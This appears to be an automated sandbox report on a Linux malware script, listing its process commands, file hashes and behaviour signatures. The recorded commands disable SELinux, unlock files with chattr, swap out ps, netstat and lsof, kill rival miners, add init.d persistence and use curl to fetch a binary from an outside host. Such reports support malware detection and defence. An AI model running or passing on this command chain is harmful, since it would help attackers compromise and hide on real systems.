[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | 0889.org | udp |
Files
/etc/sed7Dcv7Z
| MD5 | 8f111d100ea459f68d333d63a8ef2205 |
| SHA1 | 077ca9c46a964de67c0f7765745d5c6f9e2065c3 |
| SHA256 | 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354 |
| SHA512 | d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb |
/etc/init.d/sedshh05b
| MD5 | 9b392bac8c24330ad47478a5038ead13 |
| SHA1 | 6c3050598d168c42dc688cecb77fe478211c3ab9 |
| SHA256 | d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f |
| SHA512 | 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462 |
/etc/init.d/sedXptBrl
| MD5 | ce2de503acc3de02f544571e89d4d717 |
| SHA1 | 5d767b14666d82389475868f153a38594acce7ae |
| SHA256 | 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2 |
| SHA512 | 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440 |
/etc/init.d/sed1G2Nou
| MD5 | 03975a59225fad7d7c28e133de85d249 |
| SHA1 | 6f72b3b528550f16a2109bc9d86004180d7d734f |
| SHA256 | 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65 |
| SHA512 | e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e |
/etc/init.d/sedKYm7AI
| MD5 | 510488b5120b580b673a15b75a5498b0 |
| SHA1 | 0f667545ae788ae46ccc7045dc7975f044a76fd2 |
| SHA256 | a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26 |
| SHA512 | 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821 |
/etc/init.d/sedkEQzHQ
| MD5 | 85d7a3783889ea93dcda2fb488420c1c |
| SHA1 | 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c |
| SHA256 | 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0 |
| SHA512 | 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9 |
/etc/init.d/sedO2yYB2
| MD5 | ec9a7d183ec50837a12aca3f9c95cc27 |
| SHA1 | 396a23fa1d6e8a871d69786d14fd1ce4e4cba583 |
| SHA256 | c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0 |
| SHA512 | ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b |
/etc/init.d/sedNfkxxe
| MD5 | 0eb380bbeb5db57a59e298a074f1f9f3 |
| SHA1 | 284b88849b3dfd7f6c02c0d05c77a01292c8a679 |
| SHA256 | f1f205d18385e658de4d572d6df84a6ca125895fac42206443bc2b1118b2a6a2 |
| SHA512 | 428edfbdafa0ee634482ec597ce24cc96f92fcc308016bf3e4bf393711ae028a55c2d656bbfbaddec945a4ba7de17401dba2e432ed7593cbdab97e9de61b4e88 |
/etc/init.d/sedqz14Ln
| MD5 | 1ca5c0743fa797ffa364db95bb8d8d8e |
| SHA1 | 6de496930dfe00e705fa244d77e7dfa2d1c6aef8 |
| SHA256 | a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609 |
| SHA512 | 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f |
/etc/init.d/sedxXliUx
| MD5 | b868200c6e36ef87e27ead9a3ddad2db |
| SHA1 | b1cc85e63d4302b020a4679971b6c363c9392d63 |
| SHA256 | 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1 |
| SHA512 | f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a |
/etc/init.d/sedEf5nzK
| MD5 | 82698019c962069b438bd2a82d9fa1e7 |
| SHA1 | 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305 |
| SHA256 | 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7 |
| SHA512 | dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9 |
/etc/init.d/sedJgobeX
| MD5 | 27013efdfe13470845c70a9e00a61fde |
| SHA1 | 2b840ac1a1d1b866ba457bd0746144c431e944ad |
| SHA256 | c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0 |
| SHA512 | 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d |
/etc/init.d/sedQAct27
| MD5 | 49fbfd237be2a2f09576f1f9374580be |
| SHA1 | e380716a856a90f5643ddd6f3655020fc2f603dd |
| SHA256 | 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e |
| SHA512 | b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea |
memory/694-1-0xb6c30000-0xb6c41044-memory.dmp
/etc/init.d/sedxJDWUg
| MD5 | 08213cf202f2552298f62a007487e01c |
| SHA1 | 1f143ee220797f30367d4de9e65ad9ac52fd8ea4 |
| SHA256 | 0f910b4518e553ac6b77c2942ee0ce753c96189550ee2b501293f7cc936edb5e |
| SHA512 | b3fb6f52c1345aec9d70fa60f8e3f69ad999307f1502cf80c2baac332c9ce6a5ec17c4e5b5759d47a5debb9f3ba913b188611a93bd82946538ed5a019d157c33 |
/etc/init.d/sed3w2aIn
| MD5 | 019ab1c1cb24b368b0965898746bb122 |
| SHA1 | 8146b37003a86a1348c6b165b32a247ce6907525 |
| SHA256 | deb397fc57b4e2a03e97e5a85889fba9af60aea6021ad1f0030149a81ea31818 |
| SHA512 | 9366e73bef488b09122ef763b942d258107464ecf6e5f32d70de0514fc3dc9baffb7e60b69bdf45b733f7521ed7b705989b7ac778089cf3958ef2eefe05f738a |
/etc/init.d/sedQjVLAv
| MD5 | 338975eb635877703fc066e005f916d9 |
| SHA1 | 5474296634bf9e527a9a865b0cb182e61a2b66bf |
| SHA256 | 89473464fed0e27fe2540620198293adbedac0c6a309dbca7a4bcf99996526f7 |
| SHA512 | 8ef00dc8893b2c7e3a988e4ffd5b60006591c424bb97c0cfbfe44cf76e94f742fcc7263e86b6608893c0e5cc9d04d28f2404a928a3a87bfb313a3caa4be808c8 |
/etc/init.d/sedjSL3gO
| MD5 | 69497d0565055f626ee2bc84f818ce0f |
| SHA1 | b5ca73e0fef84a5aa8f0155f160952c4385045b8 |
| SHA256 | 5416ce07a0caf57f145d8f4f07e036d2decd72023e649f782d30be599ddf20da |
| SHA512 | 23d14d2c9f3356242a56f2716bd79d31f6c8a936c7a581d4b472ca126113a6b589f4ceb37816178b17ca09f508f196009ffcb390d349302a54dee0644f995bec |
/etc/init.d/sedAWxBX7
| MD5 | e4da2ae5c153148fad0b3f6e5e7ce61e |
| SHA1 | 3ef89c60b9f66bad7834dc5621772d474e3e36d9 |
| SHA256 | 373a932050d1fd4912c80fff5b941e49d37bf9899d156b524c6404f1c76e3923 |
| SHA512 | dff5193df49f6e639d76f38d0a45cd68efec5e6d4ee06801d732cdb1e3ca7057820be046fba05e13d07d934f248773df246760b6288b9753abe067f268d7cc10 |
/etc/init.d/sed4Pejsj
| MD5 | 4bf46072f9f13b2e38d58a053def37d5 |
| SHA1 | 94e4b56f7a5d40a40f256a474e244642ad778a4e |
| SHA256 | a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf |
| SHA512 | 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de |
memory/742-2-0xb6bd9000-0xb6bea044-memory.dmp
memory/764-3-0xb6bfd000-0xb6c0e044-memory.dmp
/tmp/sh-thd.QtKxCq
| MD5 | 2ff9930962f5ed39a68bfabddc3551ac |
| SHA1 | 9f99fbefee4a609f403025ed510c2fa93982303b |
| SHA256 | d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7 |
| SHA512 | 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df |
/etc/init.d/crontabs
| MD5 | f21f5717d956b60f695d350bbab05716 |
| SHA1 | 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f |
| SHA256 | c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e |
| SHA512 | 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-13 23:20
Reported
2024-11-13 23:23
Platform
debian9-mipsbe-20240611-en
Max time kernel
17s
Max time network
19s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/local/sbin/mcron | /usr/local/sbin/mcron | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/sed | N/A |
| N/A | N/A | /bin/sed | N/A |
Disables SELinux
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/sbin/setenforce | N/A |
Enumerates running processes
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/sed7tinrF | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedMwLA8Q | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed88r4Bk | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed2KPZCO | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedas3nbc | /bin/sed | N/A |
| File opened for modification | /etc/init.d/selinux | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/crontabs | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /etc/init.d/sedqUuL8d | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedvbNyP4 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed0q5Utk | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedv6RR3s | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedAnGcRa | /bin/sed | N/A |
| File opened for modification | /etc/init.d/grub | /usr/bin/curl | N/A |
| File opened for modification | /etc/init.d/sedvdRSWB | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedwN5x5f | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedoUuasG | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedL7L6fV | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedkajU1t | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sedx1ab42 | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed2x3uAc | /bin/sed | N/A |
| File opened for modification | /etc/init.d/sed3ewBKk | /bin/sed | N/A |
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/local/sbin/mcron | /usr/bin/curl | N/A |
| File opened for modification | /usr/bin/bsd-port/knerl | /usr/bin/curl | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/715/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/698/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/385/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/378/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/1/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/705/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/10/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/7/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/705/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/111/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/76/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/5/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/710/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/740/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/710/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/19/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/235/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/672/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/5/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/7/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/323/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/323/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/10/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/154/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/378/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/677/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/36/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/12/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/9/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/9/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/79/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/pkill | N/A |
| File opened for reading | /proc/11/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/320/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/672/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/11/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/9/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/323/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/414/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/704/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/235/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/122/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/21/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/37/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/2/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/121/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/356/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/9/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/121/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/16/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/20/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/18/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/111/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/6/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/668/status | /usr/bin/pkill | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sh-thd.y06k78 | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
| File opened for modification | /tmp/sh-thd.zmSXlf | /tmp/HMtWYpJGZVUZkrQK.sh | N/A |
Processes
/tmp/HMtWYpJGZVUZkrQK.sh
[/tmp/HMtWYpJGZVUZkrQK.sh]
/usr/sbin/setenforce
[setenforce 0]
/usr/bin/find
[find / -maxdepth 1 -name *.mod]
/usr/bin/chattr
[chattr -ia /bin/ps]
/usr/bin/chattr
[chattr -ia /usr/bin]
/usr/bin/chattr
[chattr -ia /etc/crontab]
/bin/cp
[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]
/bin/cp
[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]
/bin/cp
[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]
/bin/sed
[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]
/bin/mount
[mount]
/bin/grep
[grep -o /proc/[0-9]\+]
/usr/bin/sort
[sort -u]
/usr/bin/find
[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]
/usr/bin/find
[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]
/usr/bin/pkill
[pkill awk]
/usr/bin/pkill
[pkill gurb]
/usr/bin/pkill
[pkill pythno]
/usr/bin/pkill
[pkill pythno3]
/usr/bin/pkill
[pkill pythno3.1]
/usr/bin/pkill
[pkill knerl]
/usr/bin/pkill
[pkill system.mark]
/usr/bin/pkill
[pkill system.pub]
/usr/bin/pkill
[pkill netstat.cfg]
/usr/bin/pkill
[pkill bash.cfg]
/usr/bin/pkill
[pkill libgdi.so.0.8.2]
/usr/bin/pkill
[pkill kernel]
/usr/bin/pkill
[pkill linkid]
/usr/bin/pkill
[pkill mcron]
/usr/bin/pkill
[pkill xmrig]
/usr/bin/pkill
[pkill initd]
/bin/cat
[cat]
/bin/cat
[cat]
/bin/chmod
[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]
/usr/bin/chattr
[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port /usr/local/sbin]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]
/bin/ln
[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]
